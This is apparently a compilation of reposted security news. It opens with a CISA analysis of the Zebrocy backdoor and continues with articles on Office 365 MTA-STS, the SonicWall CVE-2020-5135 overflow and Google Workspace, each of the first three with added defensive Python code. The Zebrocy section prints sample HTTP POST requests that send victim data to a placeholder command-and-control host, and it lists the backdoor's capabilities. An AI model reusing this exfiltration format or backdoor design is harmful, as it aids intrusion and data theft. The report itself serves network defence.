Malware Analysis Report (AR20-303B) MAR-10310246-1.v1 – ZEBROCY Backdoor

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as Zebrocy, has been used by a sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduce exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

Two Windows executables identified as a new variant of the Zebrocy backdoor were submitted for analysis. The files are designed to allow a remote operator to perform various functions on the compromised system.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https[:]//www[.]us-cert.gov.

For a downloadable copy of IOCs, see MAR-10310246-1.v1.

Submitted Files (2)

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1 (smqft_exe)

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8 (sespmw_exe)

Findings

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1

Tags

backdoor

Details
Name: smqft_exe
Size: 4307968 bytes
Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5: ba9c59783b52b93aa6dfd4cfffc16f2b
SHA1: ee6753448c3960e8f7ba325a2c00009c31615fd2
SHA256: 0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1
SHA512: bd9e059a9d8fc7deffd12908c01c7c53fbfa9af95296365aa28080d89a668e9eed9c2770ba952cf0174f464dc93e410c92dfdbbaa7bee9f4772affd0c55dee1c
ssdeep: 49152:vATdsrWzBmMmRytymPIcGkJGUAErdu5Pp6oUlMXH85jHuXJfZLJC23:gYYBmMdEsx5gDXgHuTLJ
Entropy: 6.196940
Antivirus
BitDefender: Gen:Variant.Babar.17722
Emsisoft: Gen:Variant.Babar.17722 (B)
Lavasoft: Gen:Variant.Babar.17722
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date: 1969-12-31 19:00:00-05:00
Import Hash: 20acdf581665d0a5acf497c2fe5e0662
PE Sections
MD5                               Name      Raw Size   Entropy
b6114d2ef9c71d56d934ad743f66d209  header    1024       2.184050
0ead1c8fd485e916e3564c37083fb754  .text     1952256    6.048645
a5a4f98bad8aefba03b1fd8efa3e8668  .data     196096     5.841971
96bfb1a9a7e45816c45b7d7c1bf3c578  .rdata    2153984    5.690400
916cd27c0226ce956ed74ddf600a3a94  .eh_fram  1024       4.244370
d41d8cd98f00b204e9800998ecf8427e  .bss      0          0.000000
1f825370fd049566e1e933455eb0cd06  .idata    2560       4.462264
486c39eb96458f6f5bdb80d71bb0f828  .CRT      512        0.118370
aa692f6a7441edad64447679b7d321e8  .tls      512        0.224820
Description

This file is a 32-bit Windows executable written in the Go (Golang) programming language. The file has been identified as a new variant of the Zebrocy backdoor. The file takes a command-line argument that is expected to be an Exclusive OR (XOR) and hexadecimal encoded Uniform Resource Identifier (URI); it can also run with a plaintext URI.

Displayed below is a sample plaintext argument used by the malware:

–Begin arguments–
Domain: malware.exe <Domain>
or
IP: malware.exe <IP address:Port>
–End arguments–

When executed, it encrypts the URI using the Advanced Encryption Standard (AES)-128 Electronic Code Book (ECB) algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored in “%AppData%\Roaming\Personalization\EUDC\Policies\3030304332393839394630353537343934453244.”

It also collects information about the victim’s system, such as the username, 6 bytes of the current user’s Security Identifier (SID), and the time of infection. The data is encrypted and hexadecimal encoded before being exfiltrated using the predefined URI:

–Begin POST requests–

–Begin POST request sample–
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Accept-Encoding: gzip

--ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Content-Disposition: form-data; name="filename"; filename="04760175017f0d0d7f7706067302007f0573010204007134463136334635"
Content-Type: application/octet-stream

1
--ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228--
–End POST request sample–

–Begin POST request sample–
POST / HTTP/1.1
Host: <IP address>:<Port>
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Accept-Encoding: gzip

--44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Content-Disposition: form-data; name="filename"; filename="04760175017f0d0d7f7706067302007f0573010204007134463136334635"
Content-Type: application/octet-stream

1
--44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108--
–End POST request sample–

–End POST requests–
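The two POST samples above share a recognisable shape: the Go HTTP client’s default User-Agent, a single multipart/form-data part named “filename” whose filename is a long hex string, and a one-byte body. The following is an added example, not code from the CISA report, showing how a defender can parse a captured request and score it against that combination of indicators. The hostnames and the benign comparison request are constructed; the boundary and hex filename are taken from the report’s sample.

```python
"""Score a captured HTTP POST against the Zebrocy beacon shape from the MAR.

Added example (not from the CISA report). The beacon sample reuses the
boundary and hex filename shown in the report; hosts are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


@dataclass
class Part:
    headers: Dict[str, str]
    body: bytes
    disposition: Dict[str, str] = field(default_factory=dict)


def parse_headers(block: bytes) -> Dict[str, str]:
    """Parse 'Name: value' lines into a dict keyed by lowercase header name."""
    headers: Dict[str, str] = {}
    for line in block.split(b"\r\n"):
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return headers


def parse_disposition(value: str) -> Dict[str, str]:
    """Turn 'form-data; name="x"; filename="y"' into {"name": "x", "filename": "y"}."""
    return {m.group(1).lower(): m.group(2) for m in re.finditer(r'(\w+)="([^"]*)"', value)}


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str], List[Part]]:
    """Split a raw HTTP/1.1 request into request line, headers and multipart parts."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, _, header_block = head.partition(b"\r\n")
    headers = parse_headers(header_block)
    parts: List[Part] = []
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    if ctype.startswith("multipart/form-data") and m:
        boundary = b"--" + m.group(1).encode()
        for chunk in body.split(boundary)[1:]:
            if chunk.startswith(b"--"):      # closing delimiter "--boundary--"
                break
            phead, _, pbody = chunk.strip(b"\r\n").partition(b"\r\n\r\n")
            ph = parse_headers(phead)
            parts.append(Part(ph, pbody.rstrip(b"\r\n"),
                              parse_disposition(ph.get("content-disposition", ""))))
    return request_line.decode(errors="replace"), headers, parts


def zebrocy_indicators(raw: bytes) -> List[str]:
    """Return the MAR indicators matched by this request (empty list = no match)."""
    request_line, headers, parts = parse_request(raw)
    hits: List[str] = []
    if request_line.startswith("POST / "):
        hits.append("POST to root path")
    if headers.get("user-agent") == "Go-http-client/1.1":
        hits.append("Go default User-Agent")
    if len(parts) == 1:
        p = parts[0]
        fname = p.disposition.get("filename", "")
        if p.disposition.get("name") == "filename" and len(fname) >= 32 and HEX_RE.match(fname):
            hits.append("single form part 'filename' with hex-only filename")
        if p.body == b"1":
            hits.append("one-byte part body")
    return hits


def is_zebrocy_beacon(raw: bytes, min_hits: int = 3) -> bool:
    """A Go User-Agent alone is common; require several indicators together."""
    return len(zebrocy_indicators(raw)) >= min_hits


BOUNDARY = "ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228"   # from the MAR sample
FNAME = "04760175017f0d0d7f7706067302007f0573010204007134463136334635"      # from the MAR sample

SAMPLE_BEACON = (   # constructed from the report's sample; host is a placeholder
    "POST / HTTP/1.1\r\n"
    "Host: www.example.invalid\r\n"
    "User-Agent: Go-http-client/1.1\r\n"
    "Content-Length: 297\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "Accept-Encoding: gzip\r\n\r\n"
    f"--{BOUNDARY}\r\n"
    f'Content-Disposition: form-data; name="filename"; filename="{FNAME}"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n"
    "1\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()

SAMPLE_BENIGN = (   # constructed: an ordinary Go client uploading a document
    "POST /api/upload HTTP/1.1\r\n"
    "Host: files.example.invalid\r\n"
    "User-Agent: Go-http-client/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=deadbeef\r\n\r\n"
    "--deadbeef\r\n"
    'Content-Disposition: form-data; name="file"; filename="report.pdf"\r\n'
    "Content-Type: application/pdf\r\n\r\n"
    "%PDF-1.4 (constructed placeholder content)\r\n"
    "--deadbeef--\r\n"
).encode()

if __name__ == "__main__":
    for label, req in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        print(label, is_zebrocy_beacon(req), zebrocy_indicators(req))
```

The threshold deliberately ignores any single indicator: Go-http-client/1.1 is the default User-Agent of every Go program, so it only becomes interesting together with the fixed form-part layout and the hex filename, which in this sample carries the encoded victim data.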

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create scheduled task for persistence
–End functions–

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8

Details
Name: sespmw_exe
Size: 4313600 bytes
Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5: e8596fd7a15ecc86abbbfdea17a9e73a
SHA1: be07f6a2c9d36a7e9c4d48f21e13e912e6271d83
SHA256: 2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8
SHA512: 4a2125a26467ea4eb913abe80a59a85f3341531d634766fccabd14eb8ae1a3e7ee77162df7d5fac362272558db5a6e18f84ce193296fcdfb790e44a52fabe02a
ssdeep: 49152:J8IkRvcuFh9fQgnf/1th+jrR7PNrNdbMFvm6oUlMXycR+Z5drM0us4:UJHFh91fFg/+MX9RgY0u
Entropy: 6.197768
Antivirus
BitDefender: Gen:Variant.Babar.17722
Emsisoft: Gen:Variant.Babar.17722 (B)
Lavasoft: Gen:Variant.Babar.17722
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date: 1970-01-04 14:01:20-05:00
Import Hash: 20acdf581665d0a5acf497c2fe5e0662
PE Sections
MD5                               Name      Raw Size   Entropy
2ebbe6c38d9e8d4da2449cc05f78054a  header    1024       2.198390
a7c0885448e7013e05bf5ff61b673949  .text     1954816    6.046127
9bf966747acfa91eea3d6a1ef17cc30f  .data     196096     5.843286
31182660fce8ae07d0350ebe456b9179  .rdata    2157056    5.696834
9eeb1eeb42e99c54c6429f9122285336  .eh_fram  1024       4.292769
d41d8cd98f00b204e9800998ecf8427e  .bss      0          0.000000
0bc884e39b3ba72fb113d63988590b5c  .idata    2560       4.424718
9bbfafc74bc296cd99dc8307ffe120ac  .CRT      512        0.114463
2b60c482048e4a03fbb82db9c3416db5  .tls      512        0.224820
Description

This file is a 32-bit Windows executable written in the Go (Golang) programming language. The file has been identified as a new variant of the Zebrocy backdoor. The file takes a command-line argument that is expected to be an XOR and hexadecimal encoded URI. Unlike the other Zebrocy backdoor binary, “ba9c59783b52b93aa6dfd4cfffc16f2b”, this file cannot run with a plaintext URI. This file and ba9c59783b52b93aa6dfd4cfffc16f2b have similar functions.

When executed, it encrypts the URI using the AES-128 ECB algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored in “%AppData%\Roaming\UserData\Multimedia\Policies\3030304332393839394630353537343934453244”.

It also collects information about the victim’s system, such as the username, 6 bytes of the current user’s SID, and the time of infection. The data is encrypted and hexadecimal encoded before being exfiltrated using the predefined URI.

–Begin POST request–
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Accept-Encoding: gzip

--0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Content-Disposition: form-data; name="filename"; filename="04760175017f0d0d7f7706067302007f0573010204007134463136334635"
Content-Type: application/octet-stream

1
--0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db--
–End POST request–

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create a scheduled task for persistence manually
More
–End functions–

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  1. Maintain up-to-date antivirus signatures and engines.
  2. Keep operating system patches up-to-date.
  3. Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  4. Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  5. Enforce a strong password policy and implement regular password changes.
  6. Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  7. Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  8. Disable unnecessary services on agency workstations and servers.
  9. Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  10. Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  11. Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  12. Scan all software downloaded from the Internet prior to executing.
  13. Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

  1. 1-888-282-0870
  2. CISA Service Desk (UNCLASS)
  3. CISA SIPR (SIPRNET)
  4. CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

  1. Web: https://malware.us-cert.gov
  2. E-Mail: submit@malware.us-cert.gov
  3. FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Source :
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b

Microsoft Office 365 adds protection against downgrade and MITM attacks

Microsoft is working on adding SMTP MTA Strict Transport Security (MTA-STS) support to Exchange Online to ensure Office 365 customers’ email communication security and integrity.

Once MTA-STS is available in Office 365 Exchange Online, emails sent by users via Exchange Online will only be delivered over connections that are both authenticated and encrypted, protecting against email interception and related attacks.

Protection against MITM and downgrade attacks

MTA-STS strengthens Exchange Online email security and solves multiple SMTP security problems, including the lack of support for secure protocols, expired TLS certificates, and certificates that are not issued by trusted third parties or do not match the server’s domain name.

Because mail servers will still deliver email even when a properly secured TLS connection cannot be established, SMTP connections are exposed to various attacks, including downgrade and man-in-the-middle attacks.

“[D]owngrade attacks are possible where the STARTTLS response can be deleted, thus rendering the message in clear text,” Microsoft says. “Man-in-the-middle (MITM) attacks are also possible, whereby the message can be rerouted to an attacker’s server.”

“MTA-STS (RFC8461) helps thwart such attacks by providing a mechanism for setting domain policies that specify whether the receiving domain supports TLS and what to do when TLS can’t be negotiated, for example stop the transmission,” the company explains in a Microsoft 365 roadmap entry.

“Exchange Online (EXO) outbound mail flow now supports MTA-STS,” Microsoft also adds.

Exchange Online SMTP MTA Strict Transport Security (MTA-STS) support is currently in development and the company is planning to make it generally available during December in all environments, for all Exchange Online users.
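The mechanism quoted above (RFC 8461) works in two steps: the sending MTA looks up a `_mta-sts.<domain>` TXT record, then fetches the policy file from `https://mta-sts.<domain>/.well-known/mta-sts.txt` and, if the policy is in “enforce” mode, refuses to deliver unless TLS is negotiated with a certificate valid for an MX host the policy lists. The following added example (not Microsoft’s or Exchange Online’s code) implements that decision logic. DNS and HTTPS retrieval are replaced by constructed in-memory records, and the domain names are placeholders.

```python
"""MTA-STS (RFC 8461) policy evaluation on the sending side.

Added example, not code from Microsoft or Exchange Online. The TXT record
and policy text below are constructed; a real sender would fetch them from
DNS and over HTTPS before applying this logic.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class StsPolicy:
    version: str
    mode: str          # "enforce", "testing" or "none"
    mx: List[str]      # allowed MX host patterns; "*.example.com" matches one label
    max_age: int       # seconds for which the fetched policy may be cached


def parse_sts_txt(txt: str) -> Optional[str]:
    """Return the policy id from a '_mta-sts.<domain>' TXT record, or None if it is not STS."""
    fields = {}
    for kv in txt.split(";"):
        if "=" in kv:
            k, v = kv.split("=", 1)
            fields[k.strip()] = v.strip()
    if fields.get("v") != "STSv1":
        return None
    return fields.get("id")


def parse_sts_policy(text: str) -> StsPolicy:
    """Parse the body of https://mta-sts.<domain>/.well-known/mta-sts.txt."""
    version = mode = None
    mx: List[str] = []
    max_age = 0
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        key, value = (s.strip() for s in line.split(":", 1))
        if key == "version":
            version = value
        elif key == "mode":
            mode = value
        elif key == "mx":
            mx.append(value.lower())
        elif key == "max_age":
            max_age = int(value)
    if version != "STSv1" or mode not in ("enforce", "testing", "none"):
        raise ValueError("malformed MTA-STS policy")
    return StsPolicy(version, mode, mx, max_age)


def mx_matches(policy: StsPolicy, mx_host: str) -> bool:
    """Exact match, or a '*.' pattern matching exactly one leading label."""
    host = mx_host.lower().rstrip(".")
    for pattern in policy.mx:
        if pattern.startswith("*."):
            suffix = pattern[1:]                      # ".example.invalid"
            if host.endswith(suffix) and "." not in host[: -len(suffix)]:
                return True
        elif host == pattern:
            return True
    return False


def delivery_decision(policy: Optional[StsPolicy], mx_host: str,
                      tls_ok: bool, cert_valid_for_mx: bool) -> str:
    """Return 'deliver', 'deliver-and-report' (testing mode) or 'refuse'."""
    if policy is None or policy.mode == "none":
        return "deliver"          # no policy: legacy opportunistic-TLS behaviour
    secure = tls_ok and cert_valid_for_mx and mx_matches(policy, mx_host)
    if secure:
        return "deliver"
    return "refuse" if policy.mode == "enforce" else "deliver-and-report"


# Constructed records for a placeholder domain.
SAMPLE_TXT = "v=STSv1; id=20201029T120000;"
SAMPLE_POLICY = """version: STSv1
mode: enforce
mx: mail.example.invalid
mx: *.backup.example.invalid
max_age: 604800
"""

if __name__ == "__main__":
    policy = parse_sts_policy(SAMPLE_POLICY)
    # STARTTLS stripped by an on-path attacker: no TLS at all
    print(delivery_decision(policy, "mail.example.invalid", False, False))
    # MX record rerouted to a host the policy does not list
    print(delivery_decision(policy, "mx.attacker.invalid", True, True))
```

The two calls at the bottom correspond to the attacks Microsoft describes: with no policy the sender would fall back to cleartext when the STARTTLS response is removed, and would happily connect to a rerouted MX; under an enforce-mode policy both cases end in “refuse”.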

DNSSEC and DANE for SMTP also coming

Microsoft is also working on adding support for DNSSEC (Domain Name System Security Extensions) and DANE for SMTP (DNS-based Authentication of Named Entities) to Office 365 Exchange Online.

Support for the two SMTP standards will be added to both inbound and outbound mail, “specific to SMTP traffic between SMTP gateways” according to the Microsoft 365 roadmap and this blog post.

According to Microsoft, after including support for the two SMTP security standards in Exchange Online:

  1. DANE for SMTP will provide a more secure method for email transport. DANE uses the presence of DNS TLSA resource records to securely signal TLS support to ensure sending servers can successfully authenticate legitimate receiving email servers. This makes the secure connection resistant to downgrade and MITM attacks.
  2. DNSSEC works by digitally signing records for DNS lookup using public key cryptography. This ensures that the received DNS records have not been tampered with and are authentic. 

Microsoft is planning to release DANE and DNSSEC for SMTP in two phases, with the first one to include only outbound support during December 2020 and with the second to add inbound support by the end of next year.

Source :
https://www.bleepingcomputer.com/news/security/office-365-adds-protection-against-downgrade-and-mitm-attacks/

Critical SonicWall vulnerability affects 800K firewalls, patch now

A critical stack-based buffer overflow vulnerability has been discovered in SonicWall VPNs.

When exploited, it allows unauthenticated remote attackers to execute arbitrary code on the impacted devices.

Tracked as CVE-2020-5135, the vulnerability impacts multiple versions of SonicOS, which is run by hundreds of thousands of active VPN devices.

Craig Young of Tripwire Vulnerability and Exposure Research Team (VERT) and Nikita Abramov of Positive Technologies have been credited with discovering and reporting the vulnerability.

Shodan lists over 800,000 devices

Given an increase in employees working remotely and the reliance on corporate VPNs, easily exploitable flaws like these are concerning when it comes to security.

As confirmed by Tenable researchers and observed by BleepingComputer, as of today, Shodan shows over 800,000 VPN devices running vulnerable SonicOS software versions, depending on the search term used.

Although a Proof-of-Concept (POC) exploit is not yet available in the wild, the vast attack surface available to adversaries means companies should upgrade their devices immediately.

[Figure: Potentially exploitable devices listed on Shodan running vulnerable SonicOS versions. Source: BleepingComputer]

Impacted versions and remediation guidance

The following SonicWall VPN devices are impacted by CVE-2020-5135:

  1. SonicOS 6.5.4.7-79n and earlier
  2. SonicOS 6.5.1.11-4n and earlier
  3. SonicOS 6.0.5.3-93o and earlier
  4. SonicOSv 6.5.4.4-44v-21-794 and earlier
  5. SonicOS 7.0.0.0-1

“SonicWall has released updates to remediate this flaw. SSL VPN portals may be disconnected from the Internet as a temporary mitigation before the patch is applied,” stated Tripwire VERT’s advisory.

Upgrading to the following versions safeguards against this vulnerability:

  1. SonicOS 6.5.4.7-83n
  2. SonicOS 6.5.1.12-1n
  3. SonicOS 6.0.5.3-94o
  4. SonicOS 6.5.4.v-21s-987
  5. Gen 7 7.0.0.0-2 and onwards

Given the vast number of devices that are still running outdated SonicOS versions and the critical nature of this vulnerability, complete research findings on CVE-2020-5135 are expected to be released once enough users have patched their systems.
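The two version lists above read as “this build and earlier” per release branch, which is exactly what an inventory check needs. The following is an added example (not SonicWall’s or Tripwire’s code) that encodes the affected branches and their first fixed builds from the article and classifies the version strings found in a constructed device inventory. It compares the four numeric release components plus the build number after the hyphen; SonicOSv (virtual) strings such as 6.5.4.4-44v-21-794 follow a different build scheme and are sent to manual review rather than compared, and any branch the article does not list is reported as such rather than assumed safe.

```python
"""Triage a firewall inventory against the CVE-2020-5135 version lists.

Added example, not from SonicWall or Tripwire. The fixed-build table is
taken from the article's remediation list; the inventory is constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# First fixed build per affected branch (major, minor, patch) -> (release components, build)
FIXED_BUILDS: Dict[Tuple[int, int, int], Tuple[int, ...]] = {
    (6, 5, 4): (6, 5, 4, 7, 83),   # SonicOS 6.5.4.7-83n
    (6, 5, 1): (6, 5, 1, 12, 1),   # SonicOS 6.5.1.12-1n
    (6, 0, 5): (6, 0, 5, 3, 94),   # SonicOS 6.0.5.3-94o
    (7, 0, 0): (7, 0, 0, 0, 2),    # Gen 7 7.0.0.0-2
}

# e.g. "6.5.4.7-79n": four numeric components, a build number, optional platform letter
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)-(\d+)([a-z])?$")


def parse_version(s: str) -> Optional[Tuple[int, ...]]:
    """Return (major, minor, patch, rev, build) or None for strings in another scheme."""
    m = VERSION_RE.match(s.strip())
    if not m:
        return None
    return tuple(int(x) for x in m.groups()[:5])


def classify(version: str) -> str:
    """'vulnerable', 'patched', 'not-listed' (branch absent from the advisory) or 'review'."""
    parsed = parse_version(version)
    if parsed is None:
        return "review"            # SonicOSv or otherwise unparseable: check by hand
    fixed = FIXED_BUILDS.get(parsed[:3])
    if fixed is None:
        return "not-listed"        # do not assume safe; consult the vendor advisory
    return "vulnerable" if parsed < fixed else "patched"


def triage(inventory: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Group (device name, version string) pairs by classification."""
    groups: Dict[str, List[str]] = {}
    for device, version in inventory:
        groups.setdefault(classify(version), []).append(device)
    return groups


# Constructed inventory; device names are placeholders.
SAMPLE_INVENTORY = [
    ("fw-hq-1", "6.5.4.7-79n"),
    ("fw-hq-2", "6.5.4.7-83n"),
    ("fw-branch", "6.5.1.11-4n"),
    ("fw-lab", "6.0.5.3-94o"),
    ("fw-gen7", "7.0.0.0-1"),
    ("fw-virt", "6.5.4.4-44v-21-794"),
    ("fw-old", "6.2.7.1-23n"),
]

if __name__ == "__main__":
    for group, devices in sorted(triage(SAMPLE_INVENTORY).items()):
        print(f"{group:12s} {', '.join(devices)}")
```

The tuple comparison is what makes “and earlier” work: 6.5.4.6-50n sorts below the fixed 6.5.4.7-83n even though its build number is lower, and 6.5.4.7-83n itself sorts as patched.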

Source :
https://www.bleepingcomputer.com/news/security/critical-sonicwall-vulnerability-affects-800k-firewalls-patch-now/

Introducing Google Workspace

For more than a decade, we’ve been building products to help people transform the way they work.

Now, work itself is transforming in unprecedented ways. For many of us, work is no longer a physical place we go to, and interactions that used to take place in person are being rapidly digitized. Office workers no longer have impromptu discussions at the coffee machine or while walking to meetings together, and instead have turned their homes into workspaces. Frontline workers, from builders on a construction site to delivery specialists keeping critical supply chains moving, are turning to their phones to help get their jobs done. Doctors treating patients and local government agencies engaging with their communities are accelerating their use of technology to deliver their services.

Amidst this transformation, time is more fragmented—split between work and personal responsibilities—and human connections are more difficult than ever to establish and maintain.

These are unique challenges, but they also represent a significant opportunity to help people succeed in this highly distributed and increasingly digitized world. With the right solution in place, people are able to collaborate more easily, spend time on what matters most, and foster human connections, no matter where they are.

That solution is Google Workspace: everything you need to get anything done, now in one place. Google Workspace includes all of the productivity apps you know and love—Gmail, Calendar, Drive, Docs, Sheets, Slides, Meet, and many more. Whether you’re returning to the office, working from home, on the frontlines with your mobile device, or connecting with customers, Google Workspace is the best way to create, communicate, and collaborate.

With Google Workspace, we’re introducing three major developments:

  • new, deeply integrated user experience that helps teams collaborate more effectively, frontline workers stay connected, and businesses power new digital customer experiences
  • new brand identity that reflects our ambitious product vision and the way our products work together
  • new ways to get started with solutions tailored to the unique needs of our broad range of customers 

New user experience

At Next OnAir in July, we announced a better home for work. One that thoughtfully brings together core tools for communication and collaboration—like chat, email, voice and video calling, and content management and collaboration—into a single, unified experience to ensure that employees have access to everything they need in one place. This integrated experience is now generally available to all paying customers of Google Workspace.

In the coming months we’ll also be bringing this new experience to consumers to help them do things like set up a neighborhood group, manage a family budget, or plan a celebration using integrated tools like Gmail, Chat, Meet, Docs, and Tasks. 

We’ve already made it easier for business users to connect with customers and partners using guest access features in Chat and Drive, and in the coming weeks, you’ll be able to dynamically create and collaborate on a document with guests in a Chat room. This makes it easy to share content and directly work together with those outside your organization, and ensure that everyone has access and visibility to the same information.


When every minute you spend at work is a minute you could be helping your daughter with her homework, efficiency is everything. We’ve been working hard to add helpful features that make it easier to get your most important work done. For example, in Docs, Sheets, and Slides, you can now preview a linked file without having to open a new tab—which means less time spent moving between apps, and more time getting work done. And beginning today, when you @mention someone in your document, a smart chip will show contact details, including for those outside your organization, provide context and even suggest actions like adding that person to Contacts or reaching out via email, chat or video. 

By connecting you to relevant content and people right in Docs, Sheets and Slides, Google Workspace helps you get more done from where you already are.


We also recognize that reinforcing human connections is even more important when people are working remotely and interacting with their customers digitally. It’s what keeps teams together and helps build trust and loyalty with your customers.

Back in July, we shared that we’re bringing Meet picture-in-picture to Gmail and Chat, so you can actually see and hear the people you’re working with, while you’re collaborating. In the coming months, we’ll be rolling out Meet picture-in-picture to Docs, Sheets, and Slides, too. This is especially powerful for customer interactions where you’re pitching a proposal or walking through a document. Where before, you could only see the file you were presenting, now you’ll get all those valuable nonverbal cues that come with actually seeing someone’s face.


And because we know many companies are implementing a mix of remote and in-person work environments, Meet supports a variety of devices with the best of Google AI built in. From helpful and inclusive Series One hardware kits that provide immersive sound and effortless scalability, to native integrations with Chromecast and Nest Smart Displays that make your work experience more enjoyable—whether that’s at home or in the office.

New brand identity

10 years ago, when many of our products were first developed, they were created as individual apps that solved distinct challenges—like a better email with Gmail, or a new way for individuals to collaborate together with Docs. Over time, our products have become more integrated, so much so that the lines between our apps have started to disappear.

Our new Google Workspace brand reflects this more connected, helpful, and flexible experience, and our icons will reflect the same. In the coming weeks, you will see new four-color icons for Gmail, Drive, Calendar, Meet, and our collaborative content creation tools like Docs, Sheets, Slides that are part of the same family. They represent our commitment to building integrated communication and collaboration experiences for everyone, all with helpfulness from Google.

We are also bringing Google Workspace to our education and nonprofit customers in the coming months. Education customers can continue to access our tools via G Suite for Education, which includes Classroom, Assignments, Gmail, Calendar, Drive, Docs, Sheets, Slides, and Meet. G Suite for Nonprofits will continue to be available to eligible organizations through the Google for Nonprofits program.

New ways to get started

